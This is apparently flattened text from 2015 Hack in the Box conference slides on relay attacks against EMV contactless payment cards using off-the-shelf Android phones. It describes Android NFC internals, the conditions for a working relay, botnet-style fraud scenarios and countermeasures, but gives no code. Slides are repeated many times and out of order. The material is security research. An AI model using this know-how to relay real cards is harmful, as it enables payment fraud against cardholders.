J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
